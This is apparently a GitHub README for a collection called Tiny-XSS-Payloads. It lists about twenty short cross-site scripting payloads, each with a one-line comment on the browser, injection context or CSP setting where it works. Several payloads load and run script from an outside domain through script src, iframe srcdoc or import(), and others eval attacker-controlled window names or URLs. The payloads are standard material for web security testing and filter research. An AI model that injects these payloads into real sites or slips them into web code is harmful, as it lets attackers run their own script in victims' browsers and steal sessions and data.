/Tiny-XSS-Payloads

A collection of tiny XSS Payloads that can be used in different contexts.

Primary LanguageJavaScript

Tiny-XSS-Payloads

A collection of short XSS payloads that can be used in different contexts.

The DEMO available here: https://terjanq.github.io/Tiny-XSS-Payloads/index.html

Current Payloads

<!-- If you control the name, will work on Firefox in any context, will fail in chromium in DOM -->
<svg/onload=eval(name)>

<!-- If you control the URL, Safari-only -->
<iframe/onload=write(URL)>

<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>

<!-- If you controll the name, but unsafe-eval not enabled -->
<svg/onload=location=name>

<!-- Just a casual script -->
<script/src=//NJ.₨></script>

<!-- If you control the name of the window -->
<iframe/onload=src=top.name>

<!-- If you control the URL -->
<iframe/onload=eval('`'+URL)>

<!-- If number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/\NJ.₨?/>

<!-- for Firefox only -->
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">

<!-- If number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/\NJ.₨?/>

<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//NJ.₨></script>">

<!-- If inline styles are allowed -->
<style/onload=eval(name)>

<!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>

<!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)>

<!-- If inline styles are blocked -->
<style/onerror=eval(name)>

<!-- Uses external script as import, doesn't work in innerHTML unless Firefox -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<svg/onload=import(/\\NJ.₨/)>

<!-- Uses external script as import,  triggers if inline styles are allowed.
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<style/onload=import(/\\NJ.₨/)>

<!-- Uses external script as import -->
<!-- The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header -->
<iframe/onload=import(/\\NJ.₨/)>